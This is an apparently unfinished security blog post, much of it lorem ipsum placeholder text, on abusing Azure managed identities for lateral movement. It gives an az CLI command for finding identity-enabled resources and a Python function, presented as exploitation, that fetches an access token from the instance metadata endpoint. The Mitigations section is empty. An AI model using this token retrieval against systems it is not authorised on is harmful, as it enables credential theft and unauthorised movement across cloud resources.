Abusing Azure Managed Identities for Lateral Movement

Placeholder content for testing layout. This post will cover techniques for identifying and exploiting misconfigured managed identities in Azure to move laterally between resources.

Overview

Lorem ipsum dolor sit amet, consectetur adipiscing elit. This section will detail the attack chain from initial access to privilege escalation via managed identity abuse.

Identifying Targets

az resource list --query "[?identity.type=='SystemAssigned']" -o table

Exploitation

import requests

def get_managed_identity_token(resource="https://management.azure.com/"):
    url = "http://169.254.169.254/metadata/identity/oauth2/token"
    params = {"api-version": "2018-02-01", "resource": resource}
    headers = {"Metadata": "true"}
    response = requests.get(url, params=params, headers=headers)
    return response.json()["access_token"]

Mitigations

Details on how to properly scope managed identity permissions and detect abuse coming soon.